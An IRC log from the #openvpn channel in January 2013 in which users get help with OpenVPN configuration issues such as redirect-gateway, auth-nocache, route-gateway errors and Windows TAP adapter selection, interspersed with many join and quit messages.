15:16 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn
15:16 < Freeaqingme> Martin`, but besides that. Ideally openvpn would support smaller subnets as well. What I found in commit messages, the only reason not to do so /yet/ is that with ipv6 currently only RA seems supported
15:16 <+pekster> A /112 isn't small enough?
15:17 < Freeaqingme> for 2 hosts, a /127 should be enough ;)
15:17 <+pekster> Well, IPv6 is *huge*
15:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:17 <+pekster> If you have even a "small" /64 as a residential customer, you can support this many /112 VPN: 72057594037927936
15:17 <+pekster> That's a number so large I don't even really understand how big it is
15:17 < Freeaqingme> pekster, I know
15:17 <+pekster> The age of /30's is over. use PtP if you want to do stuff like that
15:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:22 -!- Castor_ [~hi@CPE-72-133-200-232.wi.res.rr.com] has quit [Ping timeout: 244 seconds]
15:22 < Martin`> hmm strange, connection works great (on osx) but when I disconnect I get a lot of errors
15:23 < Martin`> Sat Jan 19 21:30:16 2013 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
15:23 < Martin`> on server
15:23 <+pekster> That's normal, because the peer is returning 'ICMP port unreachable'
15:23 < Martin`> ok
15:23 <+pekster> Use 'explicit-exit-notify 2' or such on the client side if you don't like that
15:24 < Martin`> ah then he tells that he is leaving
15:24 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds]
15:24 <+pekster> Yea. Without that, a peer has no indication the connection is "down" until a timeout occurs
15:24 <+pekster> (same as if the PC crashed or the Internet link went down)
15:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:27 < MorgyN> spunk smurf
15:28 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:30 < Martin`> SIGTERM[soft,remote-exit] received, client-instance exiting
15:30 < Martin`> much better
15:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
15:30 < Martin`> now try to use it on ios
15:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:33 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:36 < Martin`> days of work with some other vpn server to get it running on ios
15:36 < Martin`> now it just works easily with openvpn :D
15:36 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:40 < Martin`> now I can route some traffic via home so I can watch tv on my ipad :P
15:41 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:44 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
15:45 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:46 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:47 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
15:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:51 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:52 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:57 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
15:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
15:59 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn
16:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
16:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
16:03 < Qianyi> anyone have a mirror for openvpn 2.3rc2?
16:03 < Qianyi> can't visit official download site
16:03 <+pekster> Qianyi: I can dump it on my personal webhost; do you really want 2.3rc2 and not 2.3.0 final?
16:03 <+rob0> I mentioned that earlier.
16:04 <+pekster> Yea, I noticed; I wasn't quite online then
16:04 < Qianyi> rob0, that is the version i would like to use, it is stable
16:04 <+pekster> Qianyi: By nature of a "release candidate" it is *LESS* stable than the final 2.3.0 release
16:04 < Qianyi> used it in the past but have new ssd without it
16:04 <+pekster> Qianyi: If you don't understand this, you probably want 2.3.0
16:05 <+pekster> (That said, there's hardly any difference between 2.3rc2 and 2.3.0 anyway)
16:05 < Qianyi> i know rc stands for release candidate
16:05 < Qianyi> it's just the version i would like to use
16:05 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
16:06 * pekster shrugs. Whatever you want, really; I'm just making sure you really want it before I go through the trouble of mirroring it for you. What platform? (and if Windows, 32 vs 64 bit?)
16:06 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
16:06 < Qianyi> pekster, thanks!
16:07 < Qianyi> windows 7 64
16:07 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
16:07 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
16:09 < Valcorb> hey guys, i have a question
16:09 < Valcorb> i have a Debian server
16:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
16:09 < Valcorb> with openvpn server installed
16:09 < Valcorb> i've configured it completely
16:09 < Valcorb> and i'm able to connect
16:09 < Valcorb> but i can't browse
16:09 < Valcorb> or anything
16:09 < Valcorb> just says 'not found'
16:09 < Valcorb> anyone know where it could be?
16:10 <+pekster> Valcorb: If you're using "Access Server" that's not supported here. The open-source openvpn package has no "server" version
16:10 -!- ade_b [~Ade@redhat/adeb] has quit [Read error: Operation timed out]
16:10 <+pekster> !as
16:10 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
16:10 < Valcorb> nono
16:10 < Valcorb> Community
16:10 <+pekster> Are you using redirect-gateway?
16:10 <+pekster> Qianyi: http://pekster.sdf.org/misc/ovpn-2.3rc2/
16:10 <@vpnHelper> Title: Index of /misc/ovpn-2.3rc2 (at pekster.sdf.org)
16:10 < Valcorb> hmm
16:10 < Valcorb> i think so
16:11 <+pekster> I've included the GPG sig too, just in case you don't trust me (if you're security-conscious you should validate it even if you do trust me since it's not a secured link)
16:11 < Valcorb> i should be using it
16:12 < Valcorb> i'll check the cong
16:12 < Valcorb> *conf
16:12 <+pekster> Valcorb: Well, not if you don't want it. It sounds a bit to me like you're redirecting your default gateway with that parameter and can't access resources after you connect due to a misconfiguration
16:12 <+pekster> !redirect
16:12 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
16:12 <@vpnHelper> http://ircpimps.org/redirect.png
16:12 < Valcorb> hmm
16:12 < Valcorb> sec
16:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
16:13 < Valcorb> ah yes i am
16:13 < Valcorb> so I should just uncomment it?
16:13 < Valcorb> *comment
16:13 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
16:13 <+pekster> Do you want to redirect all client Internet access through the VPN?
16:14 <+pekster> Don't use that directive unless you want what it does (that applies to all the directives, really) 16:14 < Valcorb> hmm 16:14 < Valcorb> i guess not 16:14 < Qianyi> pekster, much appreciate, got it 16:14 <+pekster> Qianyi: np 16:15 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:16 -!- Cpot-Oblivious is now known as Cpt-Oblivious 16:16 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Quit: Leaving] 16:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:19 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 16:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:21 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 16:22 -!- EugeneKay [eugene@itvends.com] has quit [Ping timeout: 245 seconds] 16:22 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 16:22 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 16:22 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 245 seconds] 16:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:23 -!- EugeneKay [eugene@itvends.com] has joined #openvpn 16:23 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 16:23 -!- peper [~peper@gentoo/developer/peper] has quit [Ping timeout: 276 seconds] 16:24 -!- peper [~peper@gentoo/developer/peper] has joined #openvpn 16:24 < Valcorb> pekster: i'll try later, having some vps issues 16:25 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 16:25 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn 16:25 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 16:26 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has quit [Quit: WeeChat 0.3.0] 16:26 < Valcorb> thanks tho 16:28 -!- dxtr 
[~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 16:29 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:29 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection] 16:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:30 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 16:30 -!- mode/#openvpn [+o dazo_afk] by ChanServ 16:30 -!- dazo_afk is now known as dazo 16:33 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 16:33 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:33 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 16:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:39 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:41 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:44 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:48 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:52 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 16:52 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 16:53 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:54 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 16:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 16:58 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 
248 seconds] 17:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:03 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:04 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:05 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:10 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:14 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 17:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:16 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:26 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:27 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 17:30 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:31 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:36 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:39 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 17:42 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 17:47 -!- _br_ 
[~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
17:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
17:52 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
17:57 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
17:58 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
17:58 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
18:03 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has joined #openvpn
18:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood]
18:07 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn
18:21 -!- Fritzah [u291187@ool-44c4f941.dyn.optonline.net] has quit [Remote host closed the connection]
18:41 < Valcorb> hey another question
18:42 < Valcorb> I'm using user/pass verification
18:42 < Valcorb> but it keeps asking for my user/pass every hour
18:42 < Valcorb> a way to prevent that?
18:52 -!- d12fk [~heiko@exit0.net] has quit [Quit: ZNC - http://znc.sourceforge.net]
18:53 -!- AndChat330644 [~AndChat33@c-24-126-51-244.hsd1.md.comcast.net] has joined #openvpn
18:54 < AndChat330644> My openvpn has been working on Android and suddenly I get the error message. P:OpenVPN ROUTE: OpenVPN needs a gateway parameter for a --route option and no default was specified by either --route-gateway or --ifconfig options
18:56 <+pekster> Valcorb: See --auth-nocache option which I suspect you're using without realizing what it does
18:56 <+pekster> Valcorb: You might also be accepting credentials in a way that's unavailable during re-keying/re-auth, in which case you'd need to explain your setup better
18:57 < Valcorb> is it a client issue?
18:57 <+pekster> Yes
18:57 <+pekster> AndChat330644: Pretty explicit error message. Either push the required gateway value from the server or fix the way you call the 'route' directive to include that gateway client-side
18:57 < Valcorb> yes I'm using auth-nocache
18:57 < Valcorb> should I remove it?
18:58 <+pekster> Valcorb: Why don't you look it up in the manpage and decide if you want it. The description says very specifically what it does
18:58 < Valcorb> aight
18:58 < Valcorb> thanks
18:58 <+pekster> I'm happy to answer questions after you've read the documentation, but it's bad form to come on IRC, get a reference for your problem, and then ask another question before you've read it
19:04 < AndChat330644> I have always pushed a route from server. No change in configuration. After latest application update I get this error.
19:04 < AndChat330644> On client side route is called this way. Route 0.0.0.0 0.0.0.0
19:06 <+pekster> AndChat330644: That only works if the server is pushing the 'route-gateway' value
19:06 <+pekster> Otherwise you'd need to specify the gateway client-side either explicitly as a 3rd parameter to the 'route' directive, or via a separate 'route-gateway' directive (the client can define that too if you're unable or unwilling to push it server-side)
19:11 < dioz> pekster: idk if it's me or what the problem is. 2.1.3 I couldn't get dev-node to change to Local Area Connection 2
19:11 < dioz> error would always say "mytap" so I had to change the name in windows
19:11 < dioz> I thought it was weird
19:11 < dioz> idk if you even remember talking to me ;] I see you here a lot
19:12 < AndChat330644> +pekster now it's complaining about ipv6 gw
19:13 < AndChat330644> thanks for the tips though I now know where to look
19:18 < AndChat330644> http://db.tt/Ttul4PIK
19:18 <@vpnHelper> Title: Dropbox - picsay-1358644668.jpg - Simplify your life (at db.tt)
19:20 < AndChat330644> Screen shot of my config
19:20 <+rob0> screen shot?
19:25 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Ping timeout: 240 seconds]
19:28 < AndChat330644> Lol ro
19:28 < AndChat330644> Auto correct +rob0
19:34 < AndChat330644> Do you happen to know how to ignore --ifconfig-ipv6..
19:59 -!- s7r [~s7r@openvpn/user/s7r] has quit [Quit: Leaving.]
20:12 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [Remote host closed the connection]
20:22 -!- AndChat330644 [~AndChat33@c-24-126-51-244.hsd1.md.comcast.net] has quit [Quit: Bye]
21:00 -!- thumbs is now known as httpd
21:00 -!- httpd is now known as thumbs
21:07 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Excess Flood]
21:11 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has joined #openvpn
21:16 <+pekster> dioz: Use 'openvpn.exe --show-adapters' to get both the display strings and the CLSID of valid TAP adapters on your system
21:16 <+pekster> You may use either the display name or the CLSID as you prefer
21:23 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux]
21:39 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood]
21:41 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn
21:58 < dioz> pekster: I tried using the GUID listed in the --show-adapters output too
21:58 < dioz> ooor whatever it's called
22:06 -!- nucleo [nucleo@fedora/nucleo] has quit [Quit: just make this person in IRC be quiet http://goo.gl/4RGta]
22:07 <+pekster> dioz: Works fine for me under 2.3.0, and I know I've used it before too
22:07 <+pekster> 'dev-node {0A1B2C3D...}'
22:07 <+pekster> Copy & paste the CLSID output, including the brackets
22:08 <+pekster> dioz: Your log output should show you the device name and CLSID too on a line that begins with: TAP-WIN32 device [Display Name Here] opened: \\.\Global\{CLSID_GOES_HERE}.tap
22:28 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn
22:56 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium 
http://www.kvirc.net/] 23:22 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 23:22 -!- mode/#openvpn [+v hazardous] by ChanServ 23:31 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Remote host closed the connection] 23:31 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Remote host closed the connection] 23:31 -!- bandroidx [~bandroidx@2607:f358:1:fed5:4:0:414:11] has quit [Remote host closed the connection] 23:36 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:59 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn --- Day changed Sun Jan 20 2013 00:00 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 248 seconds] 00:06 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 00:07 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 276 seconds] 00:09 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 00:12 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Remote host closed the connection] 00:14 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 00:17 -!- nucl3ar [~atom@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn 00:24 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 00:32 -!- bigmeow [~mirror@184.82.217.174] has quit [Ping timeout: 276 seconds] 00:34 -!- bigmeow [~mirror@184.82.217.174] has joined #openvpn 00:48 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 00:49 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 00:49 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 01:35 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Ping timeout: 256 seconds] 01:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 02:09 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:09 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:10 -!- bsdgeek 
[~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:10 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:11 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:12 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:12 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:13 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:13 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:17 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Excess Flood] 02:18 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 02:51 -!- Qianyi [~Qianyi@180.155.14.35] has joined #openvpn 03:44 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 03:50 -!- DaIRC49957 [Wintereise@113.11.122.231] has joined #openvpn 03:50 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Disconnected by services] 03:50 -!- DaIRC49957 is now known as Wintereise 03:50 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 03:50 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 03:54 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 04:13 -!- scyld 
[~scyld@unaffiliated/wasyl] has quit [Read error: Connection reset by peer] 04:25 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:46 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 04:46 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 04:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:50 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 04:58 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 05:05 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 05:07 -!- ade_b [~Ade@redhat/adeb] has quit [Read error: Operation timed out] 05:13 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 05:23 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 05:23 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 05:23 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:24 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has joined #openvpn 05:25 -!- Rolybrau [nemysis@unaffiliated/rolybrau] has quit [Remote host closed the connection] 05:32 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 05:35 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 05:48 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:51 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 260 seconds] 05:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:00 -!- b1rkh0ff [~b1rkh0ff@46.36.160.201] has joined #openvpn 06:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:12 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 06:43 -!- Valcorb [Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 06:52 -!- _br_ 
[~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 06:56 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:12 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:15 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:19 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:22 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:22 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 07:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:27 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:32 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:32 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:35 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:38 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:40 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:46 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:46 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 07:48 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:49 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:53 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 07:57 -!- _br_ 
[~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 07:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:00 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 08:02 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:07 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:09 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:11 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:14 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:16 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:20 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 08:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 08:21 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 08:25 